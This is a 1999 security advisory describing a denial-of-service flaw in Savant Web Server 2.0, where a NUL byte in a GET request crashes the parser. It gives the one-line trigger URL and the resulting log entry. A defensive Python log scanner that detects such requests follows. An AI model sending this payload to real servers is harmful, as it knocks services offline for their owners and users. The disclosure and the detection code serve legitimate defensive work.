Local / Remote D.o.S Attack in Savant Web Server V2.0 WIN9X / NT / 2K

USSR Advisory Code: USSR-99026

Release Date:
December 28, 1999 [2/5]

Systems Affected:
Savant Web Server V2.0 Win9X / NT / 2K and possibly other versions.

About The Software:
Savant provides support for most modern web features and technologies,
including:

    Common Gateway Interface (CGI) 1.0 and 1.1
    HTTP 0.9, 1.0, and 1.1 including keep-alive ability
    Comprehensive logging in the standard NCSA format
    User and group management
    Password protection
    Server-side image maps
    Support for over 40 file types, including MP3, RealAudio, and
    Microsoft Office files
    XML, JavaScript, Java, and ActiveX, and more!

THE PROBLEM

UssrLabs found a local / remote buffer overflow. The overflow is caused by
a NULL character in the routine that parses the GET command.

Example:
In Internet Explorer, address: http://SavantServerIP/%00/

The D.o.S action is logged in C:\Savant\Logs\general.txt; the entry looks
like this:

Attacker Ip - - [20/Dec/1999:00:10:27 -0300] "GET /%00/index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html" 301 279

Do you do the w00w00?
This advisory also acts as part of w00giving. This is another contribution
to w00giving for all you w00nderful people out there. You do know what
w00giving is, don't you? http://www.w00w00.org/advisories.html

Vendor Status:
Informed.

Vendor Url: http://hera.wku.edu/~lamonml/savant/index.html
Program Url: http://hera.wku.edu/~lamonml/savant/download.html

Credit: USSRLABS

SOLUTION
Nothing yet :(

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and
Wiretrip.

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com
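Since no fix is available, the log entry shown above is the main thing an administrator has to work with. The following is an added example, not part of the original advisory or of Savant: a small scanner for NCSA-format lines such as those in C:\Savant\Logs\general.txt that flags any request whose path carries a NUL byte. The function names, the sample lines and their 192.0.2.x addresses are constructed for illustration, and the check for the double-encoded form (%2500) is an extension beyond the single case the advisory reports.

```python
import re
from urllib.parse import unquote_to_bytes

# NCSA common log format: host ident user [time] "request" status bytes
NCSA = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Constructed sample lines (not real log data); addresses are documentation IPs.
SAMPLE = [
    '192.0.2.10 - - [20/Dec/1999:00:10:27 -0300] "GET /%00/index.htmlindex.html" 301 279',
    '192.0.2.11 - - [20/Dec/1999:00:11:02 -0300] "GET /index.html HTTP/1.0" 200 1024',
    '192.0.2.12 - - [20/Dec/1999:00:12:40 -0300] "GET /docs/%2500/ HTTP/1.0" 404 210',
    'not a log line',
]

def has_nul(target):
    """True if the request target holds a NUL byte after one or two
    rounds of percent-decoding (so both %00 and %2500 are caught)."""
    once = unquote_to_bytes(target)
    twice = unquote_to_bytes(once)
    return b"\x00" in once or b"\x00" in twice

def scan(lines):
    """Return (host, time, target) for every entry whose target has a NUL."""
    hits = []
    for line in lines:
        m = NCSA.match(line.strip())
        if not m:
            continue  # skip anything that is not an NCSA entry
        parts = m.group("request").split(" ")
        if len(parts) < 2:
            continue  # malformed request line, no target to inspect
        if has_nul(parts[1]):
            hits.append((m.group("host"), m.group("time"), parts[1]))
    return hits

if __name__ == "__main__":
    for host, when, target in scan(SAMPLE):
        print(f"{when}  {host}  NUL byte in request path: {target}")
```

The same has_nul() check can sit in a filtering proxy in front of the server to reject such requests before they reach the GET parser.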